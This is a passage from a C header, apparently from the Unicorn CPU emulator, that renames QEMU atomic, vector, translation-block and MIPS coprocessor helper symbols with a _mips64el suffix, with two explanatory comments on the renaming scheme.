helper_atomic_fetch_andq_be_mmu_mips64el #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips64el #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips64el #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips64el #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips64el #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips64el #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips64el #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips64el #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips64el #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips64el #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips64el #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips64el #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips64el #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips64el #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips64el #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips64el #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips64el #define helper_atomic_xchgb helper_atomic_xchgb_mips64el #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips64el #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips64el #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips64el #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips64el #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mips64el #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips64el #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mips64el #define helper_atomic_xor_fetchb 
helper_atomic_xor_fetchb_mips64el #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips64el #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips64el #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips64el #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips64el #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips64el #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mips64el #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips64el #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips64el #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips64el #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips64el #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips64el #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips64el #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips64el #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips64el #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips64el #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips64el #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips64el #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips64el #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips64el #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips64el #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips64el #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips64el #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips64el #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips64el #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips64el #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips64el #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips64el #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips64el #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips64el #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips64el #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips64el #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips64el #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips64el #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips64el #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips64el #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips64el #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips64el #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips64el #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips64el #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips64el #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips64el #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips64el #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips64el #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips64el #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips64el #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips64el #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips64el #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips64el #define helper_atomic_fetch_orl_le 
helper_atomic_fetch_orl_le_mips64el #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips64el #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips64el #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips64el #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips64el #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips64el #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips64el #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mips64el #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips64el #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips64el #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips64el #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips64el #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips64el #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips64el #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips64el #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips64el #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips64el #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips64el #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips64el #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips64el #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips64el #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips64el #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips64el #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips64el #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips64el #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips64el #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips64el #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips64el #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips64el #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips64el #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips64el #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips64el #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips64el #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips64el #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips64el #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips64el #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips64el #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips64el #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips64el #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips64el #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips64el #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips64el #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips64el #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips64el #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips64el #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips64el #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips64el #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips64el #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips64el 
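/*
 * Editor's note, hedged: every #define in this header follows one
 * pattern, a QEMU-global symbol is renamed to a copy carrying the
 * target suffix (_mips64el) so that several emulated cores can be
 * linked into a single Unicorn library without symbol collisions.
 * A minimal sketch of the idea, assuming a hypothetical SUFFIX/GLUE
 * pair that is NOT part of this header:
 */
#if 0
#define SUFFIX _mips64el
#define GLUE_(a, b) a##b          /* paste the two tokens               */
#define GLUE(a, b)  GLUE_(a, b)   /* expand arguments first, then paste */
#define tb_flush GLUE(tb_flush, SUFFIX)   /* -> tb_flush_mips64el       */
#endif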
#define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips64el #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips64el #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips64el #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mips64el #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips64el #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips64el #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips64el #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips64el #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mips64el #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips64el #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips64el #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips64el #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips64el #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips64el #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips64el #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips64el #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips64el #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips64el #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips64el #define cpu_ldub_code cpu_ldub_code_mips64el #define cpu_lduw_code cpu_lduw_code_mips64el #define cpu_ldl_code cpu_ldl_code_mips64el #define cpu_ldq_code cpu_ldq_code_mips64el #define helper_div_i32 helper_div_i32_mips64el #define helper_rem_i32 helper_rem_i32_mips64el #define helper_divu_i32 helper_divu_i32_mips64el #define helper_remu_i32 helper_remu_i32_mips64el #define helper_shl_i64 helper_shl_i64_mips64el #define helper_shr_i64 helper_shr_i64_mips64el #define helper_sar_i64 helper_sar_i64_mips64el #define helper_div_i64 helper_div_i64_mips64el #define helper_rem_i64 helper_rem_i64_mips64el #define helper_divu_i64 helper_divu_i64_mips64el #define helper_remu_i64 helper_remu_i64_mips64el #define helper_muluh_i64 helper_muluh_i64_mips64el #define helper_mulsh_i64 helper_mulsh_i64_mips64el #define helper_clz_i32 helper_clz_i32_mips64el #define helper_ctz_i32 helper_ctz_i32_mips64el #define helper_clz_i64 helper_clz_i64_mips64el #define helper_ctz_i64 helper_ctz_i64_mips64el #define helper_clrsb_i32 helper_clrsb_i32_mips64el #define helper_clrsb_i64 helper_clrsb_i64_mips64el #define helper_ctpop_i32 helper_ctpop_i32_mips64el #define helper_ctpop_i64 helper_ctpop_i64_mips64el #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips64el #define helper_exit_atomic helper_exit_atomic_mips64el #define helper_gvec_add8 helper_gvec_add8_mips64el #define helper_gvec_add16 helper_gvec_add16_mips64el #define helper_gvec_add32 helper_gvec_add32_mips64el #define helper_gvec_add64 helper_gvec_add64_mips64el #define helper_gvec_adds8 helper_gvec_adds8_mips64el #define helper_gvec_adds16 helper_gvec_adds16_mips64el #define helper_gvec_adds32 helper_gvec_adds32_mips64el #define helper_gvec_adds64 helper_gvec_adds64_mips64el #define helper_gvec_sub8 helper_gvec_sub8_mips64el #define helper_gvec_sub16 helper_gvec_sub16_mips64el #define helper_gvec_sub32 helper_gvec_sub32_mips64el #define helper_gvec_sub64 helper_gvec_sub64_mips64el #define helper_gvec_subs8 helper_gvec_subs8_mips64el #define helper_gvec_subs16 helper_gvec_subs16_mips64el #define helper_gvec_subs32 helper_gvec_subs32_mips64el #define helper_gvec_subs64 helper_gvec_subs64_mips64el 
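/*
 * Hedged illustration: with the renames above in effect, target-neutral
 * code keeps calling the generic names and the preprocessor routes each
 * call to the mips64el instance at compile time. Sketch only; fetch_insn
 * and its arguments are placeholders, not part of this header:
 */
#if 0
static uint32_t fetch_insn(CPUArchState *env, target_ulong pc)
{
    /* expands to cpu_ldl_code_mips64el(env, pc) once this header is seen */
    return cpu_ldl_code(env, pc);
}
#endif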
#define helper_gvec_mul8 helper_gvec_mul8_mips64el #define helper_gvec_mul16 helper_gvec_mul16_mips64el #define helper_gvec_mul32 helper_gvec_mul32_mips64el #define helper_gvec_mul64 helper_gvec_mul64_mips64el #define helper_gvec_muls8 helper_gvec_muls8_mips64el #define helper_gvec_muls16 helper_gvec_muls16_mips64el #define helper_gvec_muls32 helper_gvec_muls32_mips64el #define helper_gvec_muls64 helper_gvec_muls64_mips64el #define helper_gvec_neg8 helper_gvec_neg8_mips64el #define helper_gvec_neg16 helper_gvec_neg16_mips64el #define helper_gvec_neg32 helper_gvec_neg32_mips64el #define helper_gvec_neg64 helper_gvec_neg64_mips64el #define helper_gvec_abs8 helper_gvec_abs8_mips64el #define helper_gvec_abs16 helper_gvec_abs16_mips64el #define helper_gvec_abs32 helper_gvec_abs32_mips64el #define helper_gvec_abs64 helper_gvec_abs64_mips64el #define helper_gvec_mov helper_gvec_mov_mips64el #define helper_gvec_dup64 helper_gvec_dup64_mips64el #define helper_gvec_dup32 helper_gvec_dup32_mips64el #define helper_gvec_dup16 helper_gvec_dup16_mips64el #define helper_gvec_dup8 helper_gvec_dup8_mips64el #define helper_gvec_not helper_gvec_not_mips64el #define helper_gvec_and helper_gvec_and_mips64el #define helper_gvec_or helper_gvec_or_mips64el #define helper_gvec_xor helper_gvec_xor_mips64el #define helper_gvec_andc helper_gvec_andc_mips64el #define helper_gvec_orc helper_gvec_orc_mips64el #define helper_gvec_nand helper_gvec_nand_mips64el #define helper_gvec_nor helper_gvec_nor_mips64el #define helper_gvec_eqv helper_gvec_eqv_mips64el #define helper_gvec_ands helper_gvec_ands_mips64el #define helper_gvec_xors helper_gvec_xors_mips64el #define helper_gvec_ors helper_gvec_ors_mips64el #define helper_gvec_shl8i helper_gvec_shl8i_mips64el #define helper_gvec_shl16i helper_gvec_shl16i_mips64el #define helper_gvec_shl32i helper_gvec_shl32i_mips64el #define helper_gvec_shl64i helper_gvec_shl64i_mips64el #define helper_gvec_shr8i helper_gvec_shr8i_mips64el #define helper_gvec_shr16i helper_gvec_shr16i_mips64el #define helper_gvec_shr32i helper_gvec_shr32i_mips64el #define helper_gvec_shr64i helper_gvec_shr64i_mips64el #define helper_gvec_sar8i helper_gvec_sar8i_mips64el #define helper_gvec_sar16i helper_gvec_sar16i_mips64el #define helper_gvec_sar32i helper_gvec_sar32i_mips64el #define helper_gvec_sar64i helper_gvec_sar64i_mips64el #define helper_gvec_shl8v helper_gvec_shl8v_mips64el #define helper_gvec_shl16v helper_gvec_shl16v_mips64el #define helper_gvec_shl32v helper_gvec_shl32v_mips64el #define helper_gvec_shl64v helper_gvec_shl64v_mips64el #define helper_gvec_shr8v helper_gvec_shr8v_mips64el #define helper_gvec_shr16v helper_gvec_shr16v_mips64el #define helper_gvec_shr32v helper_gvec_shr32v_mips64el #define helper_gvec_shr64v helper_gvec_shr64v_mips64el #define helper_gvec_sar8v helper_gvec_sar8v_mips64el #define helper_gvec_sar16v helper_gvec_sar16v_mips64el #define helper_gvec_sar32v helper_gvec_sar32v_mips64el #define helper_gvec_sar64v helper_gvec_sar64v_mips64el #define helper_gvec_eq8 helper_gvec_eq8_mips64el #define helper_gvec_ne8 helper_gvec_ne8_mips64el #define helper_gvec_lt8 helper_gvec_lt8_mips64el #define helper_gvec_le8 helper_gvec_le8_mips64el #define helper_gvec_ltu8 helper_gvec_ltu8_mips64el #define helper_gvec_leu8 helper_gvec_leu8_mips64el #define helper_gvec_eq16 helper_gvec_eq16_mips64el #define helper_gvec_ne16 helper_gvec_ne16_mips64el #define helper_gvec_lt16 helper_gvec_lt16_mips64el #define helper_gvec_le16 helper_gvec_le16_mips64el #define helper_gvec_ltu16 
helper_gvec_ltu16_mips64el #define helper_gvec_leu16 helper_gvec_leu16_mips64el #define helper_gvec_eq32 helper_gvec_eq32_mips64el #define helper_gvec_ne32 helper_gvec_ne32_mips64el #define helper_gvec_lt32 helper_gvec_lt32_mips64el #define helper_gvec_le32 helper_gvec_le32_mips64el #define helper_gvec_ltu32 helper_gvec_ltu32_mips64el #define helper_gvec_leu32 helper_gvec_leu32_mips64el #define helper_gvec_eq64 helper_gvec_eq64_mips64el #define helper_gvec_ne64 helper_gvec_ne64_mips64el #define helper_gvec_lt64 helper_gvec_lt64_mips64el #define helper_gvec_le64 helper_gvec_le64_mips64el #define helper_gvec_ltu64 helper_gvec_ltu64_mips64el #define helper_gvec_leu64 helper_gvec_leu64_mips64el #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips64el #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips64el #define helper_gvec_ssadd32 helper_gvec_ssadd32_mips64el #define helper_gvec_ssadd64 helper_gvec_ssadd64_mips64el #define helper_gvec_sssub8 helper_gvec_sssub8_mips64el #define helper_gvec_sssub16 helper_gvec_sssub16_mips64el #define helper_gvec_sssub32 helper_gvec_sssub32_mips64el #define helper_gvec_sssub64 helper_gvec_sssub64_mips64el #define helper_gvec_usadd8 helper_gvec_usadd8_mips64el #define helper_gvec_usadd16 helper_gvec_usadd16_mips64el #define helper_gvec_usadd32 helper_gvec_usadd32_mips64el #define helper_gvec_usadd64 helper_gvec_usadd64_mips64el #define helper_gvec_ussub8 helper_gvec_ussub8_mips64el #define helper_gvec_ussub16 helper_gvec_ussub16_mips64el #define helper_gvec_ussub32 helper_gvec_ussub32_mips64el #define helper_gvec_ussub64 helper_gvec_ussub64_mips64el #define helper_gvec_smin8 helper_gvec_smin8_mips64el #define helper_gvec_smin16 helper_gvec_smin16_mips64el #define helper_gvec_smin32 helper_gvec_smin32_mips64el #define helper_gvec_smin64 helper_gvec_smin64_mips64el #define helper_gvec_smax8 helper_gvec_smax8_mips64el #define helper_gvec_smax16 helper_gvec_smax16_mips64el #define helper_gvec_smax32 helper_gvec_smax32_mips64el #define helper_gvec_smax64 helper_gvec_smax64_mips64el #define helper_gvec_umin8 helper_gvec_umin8_mips64el #define helper_gvec_umin16 helper_gvec_umin16_mips64el #define helper_gvec_umin32 helper_gvec_umin32_mips64el #define helper_gvec_umin64 helper_gvec_umin64_mips64el #define helper_gvec_umax8 helper_gvec_umax8_mips64el #define helper_gvec_umax16 helper_gvec_umax16_mips64el #define helper_gvec_umax32 helper_gvec_umax32_mips64el #define helper_gvec_umax64 helper_gvec_umax64_mips64el #define helper_gvec_bitsel helper_gvec_bitsel_mips64el #define cpu_restore_state cpu_restore_state_mips64el #define page_collection_lock page_collection_lock_mips64el #define page_collection_unlock page_collection_unlock_mips64el #define free_code_gen_buffer free_code_gen_buffer_mips64el #define tcg_exec_init tcg_exec_init_mips64el #define tb_cleanup tb_cleanup_mips64el #define tb_flush tb_flush_mips64el #define tb_phys_invalidate tb_phys_invalidate_mips64el #define tb_gen_code tb_gen_code_mips64el #define tb_exec_lock tb_exec_lock_mips64el #define tb_exec_unlock tb_exec_unlock_mips64el #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64el #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64el #define tb_check_watchpoint tb_check_watchpoint_mips64el #define cpu_io_recompile cpu_io_recompile_mips64el #define tb_flush_jmp_cache tb_flush_jmp_cache_mips64el #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips64el #define translator_loop_temp_check 
translator_loop_temp_check_mips64el #define translator_loop translator_loop_mips64el #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips64el #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips64el #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips64el #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips64el #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips64el #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips64el #define unassigned_mem_ops unassigned_mem_ops_mips64el #define floatx80_infinity floatx80_infinity_mips64el #define dup_const_func dup_const_func_mips64el #define gen_helper_raise_exception gen_helper_raise_exception_mips64el #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips64el #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64el #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64el #define gen_helper_cpsr_read gen_helper_cpsr_read_mips64el #define gen_helper_cpsr_write gen_helper_cpsr_write_mips64el #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips64el #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64el #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64el #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64el #define helper_mfc0_random helper_mfc0_random_mips64el #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64el #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64el #define helper_mfc0_tcbind helper_mfc0_tcbind_mips64el #define helper_mftc0_tcbind helper_mftc0_tcbind_mips64el #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64el #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64el #define helper_mfc0_tchalt helper_mfc0_tchalt_mips64el #define helper_mftc0_tchalt helper_mftc0_tchalt_mips64el #define helper_mfc0_tccontext helper_mfc0_tccontext_mips64el #define helper_mftc0_tccontext helper_mftc0_tccontext_mips64el #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64el #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64el #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64el #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64el #define helper_mfc0_count helper_mfc0_count_mips64el #define helper_mfc0_saar helper_mfc0_saar_mips64el #define helper_mfhc0_saar helper_mfhc0_saar_mips64el #define helper_mftc0_entryhi helper_mftc0_entryhi_mips64el #define helper_mftc0_cause helper_mftc0_cause_mips64el #define helper_mftc0_status helper_mftc0_status_mips64el #define helper_mfc0_lladdr helper_mfc0_lladdr_mips64el #define helper_mfc0_maar helper_mfc0_maar_mips64el #define helper_mfhc0_maar helper_mfhc0_maar_mips64el #define helper_mfc0_watchlo helper_mfc0_watchlo_mips64el #define helper_mfc0_watchhi helper_mfc0_watchhi_mips64el #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips64el #define helper_mfc0_debug helper_mfc0_debug_mips64el #define helper_mftc0_debug helper_mftc0_debug_mips64el #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64el #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64el #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64el #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64el #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64el #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64el #define helper_dmfc0_maar helper_dmfc0_maar_mips64el #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64el #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips64el #define helper_dmfc0_saar 
helper_dmfc0_saar_mips64el #define helper_mtc0_index helper_mtc0_index_mips64el #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64el #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64el #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64el #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64el #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64el #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64el #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64el #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64el #define helper_mtc0_yqmask helper_mtc0_yqmask_mips64el #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64el #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64el #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64el #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64el #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64el #define helper_mtc0_tcbind helper_mtc0_tcbind_mips64el #define helper_mttc0_tcbind helper_mttc0_tcbind_mips64el #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64el #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64el #define helper_mtc0_tchalt helper_mtc0_tchalt_mips64el #define helper_mttc0_tchalt helper_mttc0_tchalt_mips64el #define helper_mtc0_tccontext helper_mtc0_tccontext_mips64el #define helper_mttc0_tccontext helper_mttc0_tccontext_mips64el #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64el #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64el #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64el #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64el #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64el #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64el #define helper_mtc0_context helper_mtc0_context_mips64el #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips64el #define update_pagemask update_pagemask_mips64el #define helper_mtc0_pagemask helper_mtc0_pagemask_mips64el #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64el #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips64el #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips64el #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips64el #define helper_mtc0_pwfield helper_mtc0_pwfield_mips64el #define helper_mtc0_pwsize helper_mtc0_pwsize_mips64el #define helper_mtc0_wired helper_mtc0_wired_mips64el #define helper_mtc0_pwctl helper_mtc0_pwctl_mips64el #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64el #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64el #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64el #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64el #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64el #define helper_mtc0_hwrena helper_mtc0_hwrena_mips64el #define helper_mtc0_count helper_mtc0_count_mips64el #define helper_mtc0_saari helper_mtc0_saari_mips64el #define helper_mtc0_saar helper_mtc0_saar_mips64el #define helper_mthc0_saar helper_mthc0_saar_mips64el #define helper_mtc0_entryhi helper_mtc0_entryhi_mips64el #define helper_mttc0_entryhi helper_mttc0_entryhi_mips64el #define helper_mtc0_compare helper_mtc0_compare_mips64el #define helper_mtc0_status helper_mtc0_status_mips64el #define helper_mttc0_status helper_mttc0_status_mips64el #define helper_mtc0_intctl helper_mtc0_intctl_mips64el #define helper_mtc0_srsctl helper_mtc0_srsctl_mips64el #define helper_mtc0_cause helper_mtc0_cause_mips64el #define helper_mttc0_cause helper_mttc0_cause_mips64el #define helper_mftc0_epc 
